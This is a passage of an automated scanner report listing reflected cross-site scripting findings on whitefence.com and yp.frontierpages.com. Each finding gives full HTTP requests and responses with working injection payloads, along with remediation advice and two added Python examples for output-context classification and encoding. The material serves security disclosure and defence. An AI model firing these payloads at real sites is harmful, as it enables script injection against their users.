s.pageName="WF-Category-View-High-speed-internetcbfd8";f1bc04b1680";
s.eVar1="1039547";

if(typeof(_vis_opt_settings_loaded) == "boolean"){
var _combination = _vis_opt_readCookie('_vis_opt_exp_'+_vis_opt_experiment_id+'_combi');
if(typeof(_v
...[SNIP]...

2.110. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 83293--><img%20src%3da%20onerror%3dalert(1)>7f06d62cba0 was submitted in the REST URL parameter 2. This input was echoed as 83293--><img src=a onerror=alert(1)>7f06d62cba0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/home-phone83293--><img%20src%3da%20onerror%3dalert(1)>7f06d62cba0/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:52:43 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--
body.home-phone83293--><img src=a onerror=alert(1)>7f06d62cba0 div#body div.description {
background: url(/objects/images/catBacks/980/home-phone83293-->
...[SNIP]...

2.111. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7221"><img%20src%3da%20onerror%3dalert(1)>c8180e62a13 was submitted in the REST URL parameter 2. This input was echoed as a7221"><img src=a onerror=alert(1)>c8180e62a13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/home-phonea7221"><img%20src%3da%20onerror%3dalert(1)>c8180e62a13/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:52:33 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<body class="category-view home-phonea7221"><img src=a onerror=alert(1)>c8180e62a13">
...[SNIP]...

2.112. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebbf4"%3b39adcd537fe was submitted in the REST URL parameter 2. This input was echoed as ebbf4";39adcd537fe in the application's response.

The echoed "; terminates the JavaScript string literal, so whatever follows it is parsed as code. As submitted, the remainder (39adcd537fe";) is a syntax error, which aborts the entire script block; a working payload has to close the string, add its own statement and leave the block syntactically valid. The scanner did not find such a payload automatically. Examine the application's behaviour manually for input validation or other obstacles. One structural obstacle to bear in mind is that the injection point is a path segment: a payload containing a forward slash (for example a // comment used to swallow the trailing characters) is parsed as an additional path segment and may therefore not reach this sink intact.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data there. Where it is unavoidable, emit the value as a JSON string literal and additionally escape <, > and & (for example as \u003c, \u003e and \u0026), because the HTML parser ends a script block at </script> regardless of the JavaScript quoting state.

Request

GET /category/home-phoneebbf4"%3b39adcd537fe/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:52:34 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--

s.pageName="WF-Category-View-Home-phoneebbf4";39adcd537fe";
s.eVar1="1039547";

if(typeof(_vis_opt_settings_loaded) == "boolean"){
var _combination = _vis_opt_readCookie('_vis_opt_exp_'+_vis_opt_experiment_id+'_combi');
if(typeof(_v
...[SNIP]...

2.113. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/service-tips/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1a49"%3b5c895c7b51d was submitted in the REST URL parameter 2. This input was echoed as c1a49";5c895c7b51d in the application's response.

The echoed "; terminates the JavaScript string literal, so whatever follows it is parsed as code. As submitted, the remainder (5c895c7b51d";) is a syntax error, which aborts the entire script block; a working payload has to close the string, add its own statement and leave the block syntactically valid. The scanner did not find such a payload automatically. Examine the application's behaviour manually for input validation or other obstacles. One structural obstacle to bear in mind is that the injection point is a path segment: a payload containing a forward slash (for example a // comment used to swallow the trailing characters) is parsed as an additional path segment and may therefore not reach this sink intact.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data there. Where it is unavoidable, emit the value as a JSON string literal and additionally escape <, > and & (for example as \u003c, \u003e and \u0026), because the HTML parser ends a script block at </script> regardless of the JavaScript quoting state.

Request

GET /category/service-tipsc1a49"%3b5c895c7b51d/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.2.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:59:52 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--

s.pageName="WF-Category-View-Service-tipsc1a49";5c895c7b51d";
s.eVar1="1039547";

if(typeof(_vis_opt_settings_loaded) == "boolean"){
var _combination = _vis_opt_readCookie('_vis_opt_exp_'+_vis_opt_experiment_id+'_combi');
if(typeof(_v
...[SNIP]...

2.114. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/service-tips/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 2775b--><img%20src%3da%20onerror%3dalert(1)>67292b8abf7 was submitted in the REST URL parameter 2. This input was echoed as 2775b--><img src=a onerror=alert(1)>67292b8abf7 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload's leading --> closes the open HTML comment, and the <img> element that follows has a src that cannot load, so its onerror event handler runs the script; no <script> element is needed.

Remediation detail

Placing user-controllable data inside an HTML comment does not prevent XSS. A comment has no escaping syntax: any --> (or --!>) in the data closes it, and everything after that is parsed as ordinary markup, as the response below shows. Do not echo user data inside comments; if it is unavoidable, remove -- and > from the value first.

Request

GET /category/service-tips2775b--><img%20src%3da%20onerror%3dalert(1)>67292b8abf7/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.2.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:01 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--
body.service-tips2775b--><img src=a onerror=alert(1)>67292b8abf7 div#body div.description {
background: url(/objects/images/catBacks/980/service-tips2775b-->
...[SNIP]...
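The Issue detail paragraphs above state the output context of each reflection: a double-quoted attribute value in 2.111, a double-quoted JavaScript string in 2.112 and 2.113, an HTML comment in 2.114. That determination comes from locating the echoed probe in the response and inspecting the markup that precedes it. The following is an added example of such a classifier, written for this page; it is not code from the report or from the scanner that produced it. It runs over fragments constructed from the echoed lines in this section (the <script> element wrapping s.pageName is not visible in the snipped response and is an assumption) and also handles the unquoted attribute and the upper-cased echo reported later in 2.120.

```python
import re

# Constructed fragments modelled on the echoed lines in findings 2.111,
# 2.112, 2.114 and 2.120 of this report. The <script> element around
# s.pageName is assumed; the report snips everything above the "<!--".
SAMPLES = {
    "quoted_attribute": (
        'a7221"><img src=a onerror=alert(1)>c8180e62a13',
        '<body class="category-view home-phonea7221"><img src=a onerror=alert(1)>c8180e62a13">',
    ),
    "js_string": (
        'ebbf4";39adcd537fe',
        '<script type="text/javascript">\n<!--\n\n'
        's.pageName="WF-Category-View-Home-phoneebbf4";39adcd537fe";\n',
    ),
    "html_comment": (
        '2775b--><img src=a onerror=alert(1)>67292b8abf7',
        '<!--\nbody.service-tips2775b--><img src=a onerror=alert(1)>67292b8abf7 '
        'div#body div.description {\n',
    ),
    "unquoted_attribute": (
        '6b649><script>alert(1)</script>6471dcc488fb924b6',
        '<input tabindex="2" id="state" type="text" maxlength="2" name="state" '
        'value=VT6B649><SCRIPT>ALERT(1)</SCRIPT>6471DCC488FB924B6 '
        'onKeyPress="return validate_for_characters(this, event)"/>',
    ),
}

# An attribute value that was started with "=" and has no opening quote.
UNQUOTED_VALUE = re.compile(r'''=\s*[^\s"'=<>`]*$''')


def locate(body, probe):
    """Find the reflection; fall back to a case-insensitive match so that the
    upper-cased echo in 2.120 is still found and reported as modified."""
    idx = body.find(probe)
    if idx < 0:
        idx = body.lower().find(probe.lower())
    return idx


def classify(probe, body):
    """Return (context, fidelity) for the first reflection of probe in body."""
    idx = locate(body, probe)
    if idx < 0:
        return ("not reflected", None)
    before = body[:idx]
    fidelity = "unmodified" if body[idx:idx + len(probe)] == probe else "case-changed"
    lower = before.lower()

    # Inside an open <script> block: decide by the parity of quotes after the tag.
    script_open = lower.rfind("<script")
    if script_open > lower.rfind("</script>"):
        code = before[before.find(">", script_open) + 1:]
        if code.count('"') % 2:
            return ("JavaScript string (double-quoted)", fidelity)
        if code.count("'") % 2:
            return ("JavaScript string (single-quoted)", fidelity)
        return ("JavaScript code", fidelity)

    # Inside an open HTML comment.
    if before.rfind("<!--") > before.rfind("-->"):
        return ("HTML comment", fidelity)

    # Inside an open tag: quoted value, unquoted value or attribute-name position.
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:
        tag = before[lt:]
        if tag.count('"') % 2:
            return ("double-quoted attribute value", fidelity)
        if tag.count("'") % 2:
            return ("single-quoted attribute value", fidelity)
        if UNQUOTED_VALUE.search(tag):
            return ("unquoted attribute value", fidelity)
        return ("attribute name position", fidelity)

    return ("HTML text", fidelity)


if __name__ == "__main__":
    for name, (probe, body) in SAMPLES.items():
        context, fidelity = classify(probe, body)
        print(f"{name:20s} -> {context} ({fidelity})")
```

The quote-parity test is deliberately naive (it ignores backslash escapes and other string literals earlier in the script), and classification alone does not establish exploitability: in this report, Certain corresponds to an echo that demonstrably introduced a new element or event handler, Firm to a string termination with no working proof of concept. The classifier answers only the first part of that question.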

2.115. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/service-tips/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45eaa"><img%20src%3da%20onerror%3dalert(1)>353edce96bc was submitted in the REST URL parameter 2. This input was echoed as 45eaa"><img src=a onerror=alert(1)>353edce96bc in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload's leading "> closes the class attribute and the body tag, and the <img> element that follows has a src that cannot load, so its onerror event handler runs the script; no <script> element is needed.

Request

GET /category/service-tips45eaa"><img%20src%3da%20onerror%3dalert(1)>353edce96bc/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.2.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:59:51 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<body class="category-view service-tips45eaa"><img src=a onerror=alert(1)>353edce96bc">
...[SNIP]...

2.116. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfd67"%3b5b4986bfa6d was submitted in the REST URL parameter 2. This input was echoed as cfd67";5b4986bfa6d in the application's response.

The echoed "; terminates the JavaScript string literal, so whatever follows it is parsed as code. As submitted, the remainder (5b4986bfa6d";) is a syntax error, which aborts the entire script block; a working payload has to close the string, add its own statement and leave the block syntactically valid. The scanner did not find such a payload automatically. Examine the application's behaviour manually for input validation or other obstacles. One structural obstacle to bear in mind is that the injection point is a path segment: a payload containing a forward slash (for example a // comment used to swallow the trailing characters) is parsed as an additional path segment and may therefore not reach this sink intact.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data there. Where it is unavoidable, emit the value as a JSON string literal and additionally escape <, > and & (for example as \u003c, \u003e and \u0026), because the HTML parser ends a script block at </script> regardless of the JavaScript quoting state.

Request

GET /category/television-servicecfd67"%3b5b4986bfa6d/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:36 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--

s.pageName="WF-Category-View-Television-servicecfd67";5b4986bfa6d";
s.eVar1="1039547";

if(typeof(_vis_opt_settings_loaded) == "boolean"){
var _combination = _vis_opt_readCookie('_vis_opt_exp_'+_vis_opt_experiment_id+'_combi');
if(typeof(_v
...[SNIP]...

2.117. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 7b890--><img%20src%3da%20onerror%3dalert(1)>42ef7191050 was submitted in the REST URL parameter 2. This input was echoed as 7b890--><img src=a onerror=alert(1)>42ef7191050 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload's leading --> closes the open HTML comment, and the <img> element that follows has a src that cannot load, so its onerror event handler runs the script; no <script> element is needed.

Remediation detail

Placing user-controllable data inside an HTML comment does not prevent XSS. A comment has no escaping syntax: any --> (or --!>) in the data closes it, and everything after that is parsed as ordinary markup, as the response below shows. Do not echo user data inside comments; if it is unavoidable, remove -- and > from the value first.
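The remediation notes for the script context (2.112, 2.113, 2.116) and the comment context (2.114, 2.117), and the attribute-context findings that carry no remediation note (2.111, 2.115, 2.118, 2.120), all come down to encoding for the exact output context. The following added example is not code from the report or from the affected sites. It rebuilds each vulnerable template as plain string concatenation (the server-side code is assumed; only the output lines are visible in the responses), places the context-specific encoder beside it, and uses the standard-library HTML tokenizer to count start tags, so that a payload which has escaped its context shows up as an extra element. The probes are those from findings 2.111, 2.112, 2.114, 2.120 and 2.121.

```python
import html
import json
from html.parser import HTMLParser

# Probes copied from findings 2.111, 2.112, 2.114, 2.120 and 2.121 of this report.
ATTR_PROBE = 'a7221"><img src=a onerror=alert(1)>c8180e62a13'
JS_PROBE = 'ebbf4";39adcd537fe'
COMMENT_PROBE = '2775b--><img src=a onerror=alert(1)>67292b8abf7'
UNQUOTED_PROBE = '6b649><script>alert(1)</script>6471dcc488fb924b6'
REFERER_PROBE = ('http://www.google.com/search?hl=en&q=8b36d'
                 '</script><script>alert(1)</script>cf1b4e5a49c')


class TagCounter(HTMLParser):
    """Records start tags: an extra one means a payload escaped its context."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(fragment):
    parser = TagCounter()
    parser.feed(fragment)
    parser.close()
    return parser.tags


# --- One encoder per output context ---------------------------------------

def attr(value):
    """Quoted attribute value: & < > " ' become entities, so no quote in the
    data can end the attribute and no < can start a tag."""
    return html.escape(value, quote=True)


def js_string(value):
    """JavaScript string literal inside <script>: JSON supplies the quotes and
    backslash escapes; < > & are \\u-escaped on top, because the HTML tokenizer
    ends a script block at </script> whatever the JavaScript quoting state."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def comment_text(value):
    """Comments have no escaping syntax: strip '--' (removes '-->' and '--!>')
    and neutralise '>'. Not echoing user data here at all is the real fix."""
    return value.replace("--", "").replace(">", "&gt;")


# --- Templates: plain concatenation as the responses imply (assumed server
#     code), and the same templates with the context-specific encoder -------

def body_tag(category, safe):
    return '<body class="category-view %s">' % (attr(category) if safe else category)


def comment_css(category, safe):
    return '<!--\nbody.%s div#body div.description {}\n-->' % (
        comment_text(category) if safe else category)


def pagename_statement(category, safe):
    value = "WF-Category-View-" + category
    return "s.pageName=%s;" % (js_string(value) if safe else '"%s"' % value)


def tracking_script(referer, safe):
    literal = js_string(referer) if safe else '"%s"' % referer
    return "<script>\ns.prop19 = %s;\n</script>" % literal


def state_input(state, safe):
    # The fix for an unquoted attribute is to quote it AND encode the value.
    if safe:
        return '<input type="text" name="state" value="%s" />' % attr(state)
    return '<input type="text" name="state" value=%s />' % state


if __name__ == "__main__":
    for label, render, data in [
        ("attribute", body_tag, "home-phone" + ATTR_PROBE),
        ("comment", comment_css, "service-tips" + COMMENT_PROBE),
        ("script", tracking_script, REFERER_PROBE),
        ("unquoted", state_input, "VT" + UNQUOTED_PROBE),
    ]:
        print(label, start_tags(render(data, False)), "->", start_tags(render(data, True)))
```

Run as a script, each vulnerable rendering yields an extra img or script start tag where the encoded rendering yields none, and the vulnerable body tag and s.pageName statement reproduce the echoed lines of 2.111 and 2.112 exactly. The comment encoder is included only to show what is needed if the data cannot be moved out of the comment; the advice above to not echo it there at all still stands.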

Request

GET /category/television-service7b890--><img%20src%3da%20onerror%3dalert(1)>42ef7191050/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:45 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--
body.television-service7b890--><img src=a onerror=alert(1)>42ef7191050 div#body div.description {
background: url(/objects/images/catBacks/980/television-service7b890-->
...[SNIP]...

2.118. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3d74"><img%20src%3da%20onerror%3dalert(1)>6e8945171be was submitted in the REST URL parameter 2. This input was echoed as e3d74"><img src=a onerror=alert(1)>6e8945171be in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload's leading "> closes the class attribute and the body tag, and the <img> element that follows has a src that cannot load, so its onerror event handler runs the script; no <script> element is needed.

Request

GET /category/television-servicee3d74"><img%20src%3da%20onerror%3dalert(1)>6e8945171be/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:35 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<body class="category-view television-servicee3d74"><img src=a onerror=alert(1)>6e8945171be">
...[SNIP]...

2.119. http://yp.frontierpages.com/results.aspx [term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yp.frontierpages.com
Path:   /results.aspx

Issue detail

The value of the term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5b57"style%3d"x%3aexpression(alert(1))"d9518141ec5 was submitted in the term parameter. This input was echoed as d5b57"style="x:expression(alert(1))"d9518141ec5 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the href value with a quote and adds a style attribute whose value is a dynamically evaluated CSS expression. This technique is specific to Internet Explorer: expressions run in IE7 and earlier and in IE8's quirks and compatibility modes, while IE8 standards mode, later IE versions and all other browsers ignore them, so on those the injection only corrupts the link. Note that the reflected value appears twice in the same href, in the term and Heading parameters.

Request

